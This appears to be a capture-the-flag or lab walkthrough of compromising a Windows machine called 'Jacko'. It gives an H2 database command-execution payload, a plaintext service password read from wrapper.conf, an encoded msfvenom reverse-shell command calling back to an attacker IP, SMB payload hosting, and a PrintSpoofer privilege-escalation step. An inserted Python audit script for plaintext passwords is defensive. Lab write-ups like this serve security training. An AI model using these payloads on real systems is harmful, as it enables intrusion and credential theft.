🪟Jacko
IP: 192.168.65.66
Enumeration
Nmap scan
nmap 192.168.65.66 -sV -p- -A

Service Enumeration
TCP/80


TCP/135
TCP/139/445
Went back and tried to connect to the shares with tony's credentials but neither share worked.
TCP/7680
TCP/8082

The credentials already in the form will work to log in, just hit connect.
Found tony as username.

LFI

Found version numbers.

Found exploit in exploit-db for this exact version. https://www.exploit-db.com/exploits/49384 Confirmed RCE.

Found some credentials in wrapper.conf
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c type wrapper.conf").getInputStream()).useDelimiter("\\Z").next()');

Found tony's credentials.
wrapper.ntservice.account=.\tony
wrapper.ntservice.password=BeyondLakeBarber399
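From the defender's side, the finding above is a service password stored in clear text in wrapper.conf. The following audit check is an added example, not part of the original notes; it flags the two wrapper.ntservice properties quoted above without echoing the secret. The function names and the sample file contents are constructed for illustration.

```python
import re

# Property names as they appear in the wrapper.conf lines on this page.
ACCOUNT_KEY = "wrapper.ntservice.account"
PASSWORD_KEY = "wrapper.ntservice.password"

# Constructed sample input (not the file from the target host).
SAMPLE_CONF = r"""
# Constructed example file
wrapper.java.command=java
wrapper.ntservice.account=.\svc_example
  wrapper.ntservice.password = NotARealPassword1
#wrapper.ntservice.password=commented-out-old-value
"""

def parse_properties(text):
    """Return {key: (line_number, value)} for active key=value lines."""
    props = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = (lineno, value.strip())
    return props

def audit_wrapper_conf(text):
    """Return findings as (line_number, key, message); the secret is never echoed."""
    props = parse_properties(text)
    findings = []
    if PASSWORD_KEY in props:
        lineno, value = props[PASSWORD_KEY]
        if value:
            findings.append((lineno, PASSWORD_KEY,
                             f"plaintext service password stored ({len(value)} chars, redacted)"))
    if ACCOUNT_KEY in props:
        lineno, value = props[ACCOUNT_KEY]
        # A ".\name" value denotes a local user account on the machine.
        m = re.fullmatch(r"\.\\(.+)", value)
        if m:
            findings.append((lineno, ACCOUNT_KEY,
                             f"service runs as local user account '{m.group(1)}'"))
    return findings

if __name__ == "__main__":
    for lineno, key, message in audit_wrapper_conf(SAMPLE_CONF):
        print(f"line {lineno}: {key}: {message}")
```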
Had to get a hint here, as none of the shells I kept trying worked, and had to look at two or three different methods in different walkthroughs.
Created reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.65 LPORT=8082 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o revshell.exe
Hosted it via SMB.
sudo smbserver.py -smb2support Share $PWD
Ran my listener and got a shell.

Fixed the path because only a few commands were running.
set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
Possible Print Spooler LPE.

I believe this may be vulnerable to a printer nightmare attack. Curled printspoofer.exe to tony's desktop. https://github.com/dievus/printspoofer
Root
